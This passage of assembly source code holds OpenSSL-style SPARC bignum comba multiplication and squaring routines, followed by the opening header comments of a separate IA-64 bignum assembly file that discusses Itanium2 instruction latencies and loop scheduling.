rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
ld bp(5),b_5
umul a_0,b_4,t_1 !=!mul_add_c(a[0],b[4],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1 !=
st c_2,rp(4) !r[4]=c2;
umul a_0,b_5,t_1 !mul_add_c(a[0],b[5],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2 !=
addxcc c_1,t_2,c_1
addx %g0,%g0,c_2
umul a_1,b_4,t_1 !mul_add_c(a[1],b[4],c3,c1,c2);
addcc c_3,t_1,c_3 !=
rd %y,t_2
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2
umul a_2,b_3,t_1 !=!mul_add_c(a[2],b[3],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2 !=
umul a_3,b_2,t_1 !mul_add_c(a[3],b[2],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1 !=
addx c_2,%g0,c_2
ld ap(5),a_5
umul a_4,b_1,t_1 !mul_add_c(a[4],b[1],c3,c1,c2);
addcc c_3,t_1,c_3 !=
rd %y,t_2
addxcc c_1,t_2,c_1
ld ap(6),a_6
addx c_2,%g0,c_2 !=
umul a_5,b_0,t_1 !mul_add_c(a[5],b[0],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1 !=
addx c_2,%g0,c_2
st c_3,rp(5) !r[5]=c3;
umul a_6,b_0,t_1 !mul_add_c(a[6],b[0],c1,c2,c3);
addcc c_1,t_1,c_1 !=
rd %y,t_2
addxcc c_2,t_2,c_2
addx %g0,%g0,c_3
umul a_5,b_1,t_1 !=!mul_add_c(a[5],b[1],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3 !=
umul a_4,b_2,t_1 !mul_add_c(a[4],b[2],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2 !=
addx c_3,%g0,c_3
umul a_3,b_3,t_1 !mul_add_c(a[3],b[3],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2 !=
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3
umul a_2,b_4,t_1 !mul_add_c(a[2],b[4],c1,c2,c3);
addcc c_1,t_1,c_1 !=
rd %y,t_2
addxcc c_2,t_2,c_2
ld bp(6),b_6
addx c_3,%g0,c_3 !=
umul a_1,b_5,t_1 !mul_add_c(a[1],b[5],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2 !=
addx c_3,%g0,c_3
ld bp(7),b_7
umul a_0,b_6,t_1 !mul_add_c(a[0],b[6],c1,c2,c3);
addcc c_1,t_1,c_1 !=
rd %y,t_2
addxcc c_2,t_2,c_2
st c_1,rp(6) !r[6]=c1;
addx c_3,%g0,c_3 !=
umul a_0,b_7,t_1 !mul_add_c(a[0],b[7],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2
addxcc c_3,t_2,c_3 !=
addx %g0,%g0,c_1
umul a_1,b_6,t_1 !mul_add_c(a[1],b[6],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
umul a_2,b_5,t_1 !mul_add_c(a[2],b[5],c2,c3,c1);
addcc c_2,t_1,c_2 !=
rd %y,t_2
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
umul a_3,b_4,t_1 !=!mul_add_c(a[3],b[4],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1 !=
umul a_4,b_3,t_1 !mul_add_c(a[4],b[3],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2
addxcc c_3,t_2,c_3 !=
addx c_1,%g0,c_1
umul a_5,b_2,t_1 !mul_add_c(a[5],b[2],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
ld ap(7),a_7
umul a_6,b_1,t_1 !=!mul_add_c(a[6],b[1],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1 !=
umul a_7,b_0,t_1 !mul_add_c(a[7],b[0],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2
addxcc c_3,t_2,c_3 !=
addx c_1,%g0,c_1
st c_2,rp(7) !r[7]=c2;
umul a_7,b_1,t_1 !mul_add_c(a[7],b[1],c3,c1,c2);
addcc c_3,t_1,c_3 !=
rd %y,t_2
addxcc c_1,t_2,c_1
addx %g0,%g0,c_2
umul a_6,b_2,t_1 !=!mul_add_c(a[6],b[2],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2 !=
umul a_5,b_3,t_1 !mul_add_c(a[5],b[3],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1 !=
addx c_2,%g0,c_2
umul a_4,b_4,t_1 !mul_add_c(a[4],b[4],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2 !=
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2
umul a_3,b_5,t_1 !mul_add_c(a[3],b[5],c3,c1,c2);
addcc c_3,t_1,c_3 !=
rd %y,t_2
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2
umul a_2,b_6,t_1 !=!mul_add_c(a[2],b[6],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2 !=
umul a_1,b_7,t_1 !mul_add_c(a[1],b[7],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1 !
addx c_2,%g0,c_2
st c_3,rp(8) !r[8]=c3;
umul a_2,b_7,t_1 !mul_add_c(a[2],b[7],c1,c2,c3);
addcc c_1,t_1,c_1 !=
rd %y,t_2
addxcc c_2,t_2,c_2
addx %g0,%g0,c_3
umul a_3,b_6,t_1 !=!mul_add_c(a[3],b[6],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3 !=
umul a_4,b_5,t_1 !mul_add_c(a[4],b[5],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2 !=
addx c_3,%g0,c_3
umul a_5,b_4,t_1 !mul_add_c(a[5],b[4],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2 !=
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3
umul a_6,b_3,t_1 !mul_add_c(a[6],b[3],c1,c2,c3);
addcc c_1,t_1,c_1 !=
rd %y,t_2
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3
umul a_7,b_2,t_1 !=!mul_add_c(a[7],b[2],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3 !=
st c_1,rp(9) !r[9]=c1;
umul a_7,b_3,t_1 !mul_add_c(a[7],b[3],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx %g0,%g0,c_1
umul a_6,b_4,t_1 !mul_add_c(a[6],b[4],c2,c3,c1);
addcc c_2,t_1,c_2 !=
rd %y,t_2
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
umul a_5,b_5,t_1 !=!mul_add_c(a[5],b[5],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1 !=
umul a_4,b_6,t_1 !mul_add_c(a[4],b[6],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2
addxcc c_3,t_2,c_3 !=
addx c_1,%g0,c_1
umul a_3,b_7,t_1 !mul_add_c(a[3],b[7],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
st c_2,rp(10) !r[10]=c2;
umul a_4,b_7,t_1 !=!mul_add_c(a[4],b[7],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1
addx %g0,%g0,c_2 !=
umul a_5,b_6,t_1 !mul_add_c(a[5],b[6],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1 !=
addx c_2,%g0,c_2
umul a_6,b_5,t_1 !mul_add_c(a[6],b[5],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2 !=
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2
umul a_7,b_4,t_1 !mul_add_c(a[7],b[4],c3,c1,c2);
addcc c_3,t_1,c_3 !=
rd %y,t_2
addxcc c_1,t_2,c_1
st c_3,rp(11) !r[11]=c3;
addx c_2,%g0,c_2 !=
umul a_7,b_5,t_1 !mul_add_c(a[7],b[5],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2 !=
addx %g0,%g0,c_3
umul a_6,b_6,t_1 !mul_add_c(a[6],b[6],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2 !=
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3
umul a_5,b_7,t_1 !mul_add_c(a[5],b[7],c1,c2,c3);
addcc c_1,t_1,c_1 !=
rd %y,t_2
addxcc c_2,t_2,c_2
st c_1,rp(12) !r[12]=c1;
addx c_3,%g0,c_3 !=
umul a_6,b_7,t_1 !mul_add_c(a[6],b[7],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2
addxcc c_3,t_2,c_3 !=
addx %g0,%g0,c_1
umul a_7,b_6,t_1 !mul_add_c(a[7],b[6],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
st c_2,rp(13) !r[13]=c2;
umul a_7,b_7,t_1 !=!mul_add_c(a[7],b[7],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1
nop !=
st c_3,rp(14) !r[14]=c3;
st c_1,rp(15) !r[15]=c1;
ret
restore %g0,%g0,%o0
.type bn_mul_comba8,#function
.size bn_mul_comba8,(.-bn_mul_comba8)
.align 32
.global bn_mul_comba4
/*
* void bn_mul_comba4(r,a,b)
* BN_ULONG *r,*a,*b;
*/
bn_mul_comba4:
save %sp,FRAME_SIZE,%sp
ld ap(0),a_0
ld bp(0),b_0
umul a_0,b_0,c_1 !=!mul_add_c(a[0],b[0],c1,c2,c3);
ld bp(1),b_1
rd %y,c_2
st c_1,rp(0) !r[0]=c1;
umul a_0,b_1,t_1 !=!mul_add_c(a[0],b[1],c2,c3,c1);
ld ap(1),a_1
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc %g0,t_2,c_3
addx %g0,%g0,c_1
ld ap(2),a_2
umul a_1,b_0,t_1 !=!mul_add_c(a[1],b[0],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1 !=
st c_2,rp(1) !r[1]=c2;
umul a_2,b_0,t_1 !mul_add_c(a[2],b[0],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2 !=
addxcc c_1,t_2,c_1
addx %g0,%g0,c_2
ld bp(2),b_2
umul a_1,b_1,t_1 !=!mul_add_c(a[1],b[1],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2 !=
ld bp(3),b_3
umul a_0,b_2,t_1 !mul_add_c(a[0],b[2],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2 !=
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2
st c_3,rp(2) !r[2]=c3;
umul a_0,b_3,t_1 !=!mul_add_c(a[0],b[3],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2
addx %g0,%g0,c_3 !=
umul a_1,b_2,t_1 !mul_add_c(a[1],b[2],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2 !=
addx c_3,%g0,c_3
ld ap(3),a_3
umul a_2,b_1,t_1 !mul_add_c(a[2],b[1],c1,c2,c3);
addcc c_1,t_1,c_1 !=
rd %y,t_2
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3
umul a_3,b_0,t_1 !=!mul_add_c(a[3],b[0],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3 !=
st c_1,rp(3) !r[3]=c1;
umul a_3,b_1,t_1 !mul_add_c(a[3],b[1],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx %g0,%g0,c_1
umul a_2,b_2,t_1 !mul_add_c(a[2],b[2],c2,c3,c1);
addcc c_2,t_1,c_2 !=
rd %y,t_2
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
umul a_1,b_3,t_1 !=!mul_add_c(a[1],b[3],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1 !=
st c_2,rp(4) !r[4]=c2;
umul a_2,b_3,t_1 !mul_add_c(a[2],b[3],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2 !=
addxcc c_1,t_2,c_1
addx %g0,%g0,c_2
umul a_3,b_2,t_1 !mul_add_c(a[3],b[2],c3,c1,c2);
addcc c_3,t_1,c_3 !=
rd %y,t_2
addxcc c_1,t_2,c_1
st c_3,rp(5) !r[5]=c3;
addx c_2,%g0,c_2 !=
umul a_3,b_3,t_1 !mul_add_c(a[3],b[3],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2 !=
st c_1,rp(6) !r[6]=c1;
st c_2,rp(7) !r[7]=c2;
ret
restore %g0,%g0,%o0
.type bn_mul_comba4,#function
.size bn_mul_comba4,(.-bn_mul_comba4)
.align 32
.global bn_sqr_comba8
bn_sqr_comba8:
save %sp,FRAME_SIZE,%sp
ld ap(0),a_0
ld ap(1),a_1
umul a_0,a_0,c_1 !=!sqr_add_c(a,0,c1,c2,c3);
rd %y,c_2
st c_1,rp(0) !r[0]=c1;
ld ap(2),a_2
umul a_0,a_1,t_1 !=!sqr_add_c2(a,1,0,c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2
addxcc %g0,t_2,c_3
addx %g0,%g0,c_1 !=
addcc c_2,t_1,c_2
addxcc c_3,t_2,c_3
st c_2,rp(1) !r[1]=c2;
addx c_1,%g0,c_1 !=
umul a_2,a_0,t_1 !sqr_add_c2(a,2,0,c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1 !=
addx %g0,%g0,c_2
addcc c_3,t_1,c_3
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2 !=
ld ap(3),a_3
umul a_1,a_1,t_1 !sqr_add_c(a,1,c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2 !=
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2
st c_3,rp(2) !r[2]=c3;
umul a_0,a_3,t_1 !=!sqr_add_c2(a,3,0,c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2
addx %g0,%g0,c_3 !=
addcc c_1,t_1,c_1
addxcc c_2,t_2,c_2
ld ap(4),a_4
addx c_3,%g0,c_3 !=
umul a_1,a_2,t_1 !sqr_add_c2(a,2,1,c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2 !=
addx c_3,%g0,c_3
addcc c_1,t_1,c_1
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3 !=
st c_1,rp(3) !r[3]=c1;
umul a_4,a_0,t_1 !sqr_add_c2(a,4,0,c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx %g0,%g0,c_1
addcc c_2,t_1,c_2
addxcc c_3,t_2,c_3 !=
addx c_1,%g0,c_1
umul a_3,a_1,t_1 !sqr_add_c2(a,3,1,c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
addcc c_2,t_1,c_2
addxcc c_3,t_2,c_3 !=
addx c_1,%g0,c_1
ld ap(5),a_5
umul a_2,a_2,t_1 !sqr_add_c(a,2,c2,c3,c1);
addcc c_2,t_1,c_2 !=
rd %y,t_2
addxcc c_3,t_2,c_3
st c_2,rp(4) !r[4]=c2;
addx c_1,%g0,c_1 !=
umul a_0,a_5,t_1 !sqr_add_c2(a,5,0,c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1 !=
addx %g0,%g0,c_2
addcc c_3,t_1,c_3
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2 !=
umul a_1,a_4,t_1 !sqr_add_c2(a,4,1,c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1 !=
addx c_2,%g0,c_2
addcc c_3,t_1,c_3
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2 !=
ld ap(6),a_6
umul a_2,a_3,t_1 !sqr_add_c2(a,3,2,c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2 !=
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2
addcc c_3,t_1,c_3
addxcc c_1,t_2,c_1 !=
addx c_2,%g0,c_2
st c_3,rp(5) !r[5]=c3;
umul a_6,a_0,t_1 !sqr_add_c2(a,6,0,c1,c2,c3);
addcc c_1,t_1,c_1 !=
rd %y,t_2
addxcc c_2,t_2,c_2
addx %g0,%g0,c_3
addcc c_1,t_1,c_1 !=
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3
umul a_5,a_1,t_1 !sqr_add_c2(a,5,1,c1,c2,c3);
addcc c_1,t_1,c_1 !=
rd %y,t_2
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3
addcc c_1,t_1,c_1 !=
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3
umul a_4,a_2,t_1 !sqr_add_c2(a,4,2,c1,c2,c3);
addcc c_1,t_1,c_1 !=
rd %y,t_2
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3
addcc c_1,t_1,c_1 !=
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3
ld ap(7),a_7
umul a_3,a_3,t_1 !=!sqr_add_c(a,3,c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3 !=
st c_1,rp(6) !r[6]=c1;
umul a_0,a_7,t_1 !sqr_add_c2(a,7,0,c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx %g0,%g0,c_1
addcc c_2,t_1,c_2
addxcc c_3,t_2,c_3 !=
addx c_1,%g0,c_1
umul a_1,a_6,t_1 !sqr_add_c2(a,6,1,c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
addcc c_2,t_1,c_2
addxcc c_3,t_2,c_3 !=
addx c_1,%g0,c_1
umul a_2,a_5,t_1 !sqr_add_c2(a,5,2,c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
addcc c_2,t_1,c_2
addxcc c_3,t_2,c_3 !=
addx c_1,%g0,c_1
umul a_3,a_4,t_1 !sqr_add_c2(a,4,3,c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
addcc c_2,t_1,c_2
addxcc c_3,t_2,c_3 !=
addx c_1,%g0,c_1
st c_2,rp(7) !r[7]=c2;
umul a_7,a_1,t_1 !sqr_add_c2(a,7,1,c3,c1,c2);
addcc c_3,t_1,c_3 !=
rd %y,t_2
addxcc c_1,t_2,c_1
addx %g0,%g0,c_2
addcc c_3,t_1,c_3 !=
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2
umul a_6,a_2,t_1 !sqr_add_c2(a,6,2,c3,c1,c2);
addcc c_3,t_1,c_3 !=
rd %y,t_2
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2
addcc c_3,t_1,c_3 !=
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2
umul a_5,a_3,t_1 !sqr_add_c2(a,5,3,c3,c1,c2);
addcc c_3,t_1,c_3 !=
rd %y,t_2
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2
addcc c_3,t_1,c_3 !=
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2
umul a_4,a_4,t_1 !sqr_add_c(a,4,c3,c1,c2);
addcc c_3,t_1,c_3 !=
rd %y,t_2
addxcc c_1,t_2,c_1
st c_3,rp(8) !r[8]=c3;
addx c_2,%g0,c_2 !=
umul a_2,a_7,t_1 !sqr_add_c2(a,7,2,c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2 !=
addx %g0,%g0,c_3
addcc c_1,t_1,c_1
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3 !=
umul a_3,a_6,t_1 !sqr_add_c2(a,6,3,c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2 !=
addx c_3,%g0,c_3
addcc c_1,t_1,c_1
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3 !=
umul a_4,a_5,t_1 !sqr_add_c2(a,5,4,c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2 !=
addx c_3,%g0,c_3
addcc c_1,t_1,c_1
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3 !=
st c_1,rp(9) !r[9]=c1;
umul a_7,a_3,t_1 !sqr_add_c2(a,7,3,c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx %g0,%g0,c_1
addcc c_2,t_1,c_2
addxcc c_3,t_2,c_3 !=
addx c_1,%g0,c_1
umul a_6,a_4,t_1 !sqr_add_c2(a,6,4,c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
addcc c_2,t_1,c_2
addxcc c_3,t_2,c_3 !=
addx c_1,%g0,c_1
umul a_5,a_5,t_1 !sqr_add_c(a,5,c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
st c_2,rp(10) !r[10]=c2;
umul a_4,a_7,t_1 !=!sqr_add_c2(a,7,4,c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1
addx %g0,%g0,c_2 !=
addcc c_3,t_1,c_3
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2
umul a_5,a_6,t_1 !=!sqr_add_c2(a,6,5,c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2 !=
addcc c_3,t_1,c_3
addxcc c_1,t_2,c_1
st c_3,rp(11) !r[11]=c3;
addx c_2,%g0,c_2 !=
umul a_7,a_5,t_1 !sqr_add_c2(a,7,5,c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2 !=
addx %g0,%g0,c_3
addcc c_1,t_1,c_1
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3 !=
umul a_6,a_6,t_1 !sqr_add_c(a,6,c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2 !=
addx c_3,%g0,c_3
st c_1,rp(12) !r[12]=c1;
umul a_6,a_7,t_1 !sqr_add_c2(a,7,6,c2,c3,c1);
addcc c_2,t_1,c_2 !=
rd %y,t_2
addxcc c_3,t_2,c_3
addx %g0,%g0,c_1
addcc c_2,t_1,c_2 !=
addxcc c_3,t_2,c_3
st c_2,rp(13) !r[13]=c2;
addx c_1,%g0,c_1 !=
umul a_7,a_7,t_1 !sqr_add_c(a,7,c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1 !=
st c_3,rp(14) !r[14]=c3;
st c_1,rp(15) !r[15]=c1;
ret
restore %g0,%g0,%o0
.type bn_sqr_comba8,#function
.size bn_sqr_comba8,(.-bn_sqr_comba8)
.align 32
.global bn_sqr_comba4
/*
* void bn_sqr_comba4(r,a)
* BN_ULONG *r,*a;
*/
bn_sqr_comba4:
save %sp,FRAME_SIZE,%sp
ld ap(0),a_0
umul a_0,a_0,c_1 !sqr_add_c(a,0,c1,c2,c3);
ld ap(1),a_1 !=
rd %y,c_2
st c_1,rp(0) !r[0]=c1;
ld ap(2),a_2
umul a_0,a_1,t_1 !=!sqr_add_c2(a,1,0,c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2
addxcc %g0,t_2,c_3
addx %g0,%g0,c_1 !=
addcc c_2,t_1,c_2
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1 !=
st c_2,rp(1) !r[1]=c2;
umul a_2,a_0,t_1 !sqr_add_c2(a,2,0,c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2 !=
addxcc c_1,t_2,c_1
addx %g0,%g0,c_2
addcc c_3,t_1,c_3
addxcc c_1,t_2,c_1 !=
addx c_2,%g0,c_2
ld ap(3),a_3
umul a_1,a_1,t_1 !sqr_add_c(a,1,c3,c1,c2);
addcc c_3,t_1,c_3 !=
rd %y,t_2
addxcc c_1,t_2,c_1
st c_3,rp(2) !r[2]=c3;
addx c_2,%g0,c_2 !=
umul a_0,a_3,t_1 !sqr_add_c2(a,3,0,c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2 !=
addx %g0,%g0,c_3
addcc c_1,t_1,c_1
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3 !=
umul a_1,a_2,t_1 !sqr_add_c2(a,2,1,c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2 !=
addx c_3,%g0,c_3
addcc c_1,t_1,c_1
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3 !=
st c_1,rp(3) !r[3]=c1;
umul a_3,a_1,t_1 !sqr_add_c2(a,3,1,c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx %g0,%g0,c_1
addcc c_2,t_1,c_2
addxcc c_3,t_2,c_3 !=
addx c_1,%g0,c_1
umul a_2,a_2,t_1 !sqr_add_c(a,2,c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
st c_2,rp(4) !r[4]=c2;
umul a_2,a_3,t_1 !=!sqr_add_c2(a,3,2,c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1
addx %g0,%g0,c_2 !=
addcc c_3,t_1,c_3
addxcc c_1,t_2,c_1
st c_3,rp(5) !r[5]=c3;
addx c_2,%g0,c_2 !=
umul a_3,a_3,t_1 !sqr_add_c(a,3,c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2 !=
st c_1,rp(6) !r[6]=c1;
st c_2,rp(7) !r[7]=c2;
ret
restore %g0,%g0,%o0
.type bn_sqr_comba4,#function
.size bn_sqr_comba4,(.-bn_sqr_comba4)
.align 32
|
AIFM-sys/AIFM
| 45,313
|
shenango/apps/parsec/pkgs/libs/ssl/src/crypto/bn/asm/ia64.S
|
.explicit
.text
.ident "ia64.S, Version 2.1"
.ident "IA-64 ISA artwork by Andy Polyakov <appro@fy.chalmers.se>"
//
// ====================================================================
// Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
// project.
//
// Rights for redistribution and usage in source and binary forms are
// granted according to the OpenSSL license. Warranty of any kind is
// disclaimed.
// ====================================================================
//
// Version 2.x is Itanium2 re-tune. Few words about how Itanum2 is
// different from Itanium to this module viewpoint. Most notably, is it
// "wider" than Itanium? Can you experience loop scalability as
// discussed in commentary sections? Not really:-( Itanium2 has 6
// integer ALU ports, i.e. it's 2 ports wider, but it's not enough to
// spin twice as fast, as I need 8 IALU ports. Amount of floating point
// ports is the same, i.e. 2, while I need 4. In other words, to this
// module Itanium2 remains effectively as "wide" as Itanium. Yet it's
// essentially different in respect to this module, and a re-tune was
// required. Well, because some intruction latencies has changed. Most
// noticeably those intensively used:
//
// Itanium Itanium2
// ldf8 9 6 L2 hit
// ld8 2 1 L1 hit
// getf 2 5
// xma[->getf] 7[+1] 4[+0]
// add[->st8] 1[+1] 1[+0]
//
// What does it mean? You might ratiocinate that the original code
// should run just faster... Because sum of latencies is smaller...
// Wrong! Note that getf latency increased. This means that if a loop is
// scheduled for lower latency (as they were), then it will suffer from
// stall condition and the code will therefore turn anti-scalable, e.g.
// original bn_mul_words spun at 5*n or 2.5 times slower than expected
// on Itanium2! What to do? Reschedule loops for Itanium2? But then
// Itanium would exhibit anti-scalability. So I've chosen to reschedule
// for worst latency for every instruction aiming for best *all-round*
// performance.
// Q. How much faster does it get?
// A. Here is the output from 'openssl speed rsa dsa' for vanilla
// 0.9.6a compiled with gcc version 2.96 20000731 (Red Hat
// Linux 7.1 2.96-81):
//
// sign verify sign/s verify/s
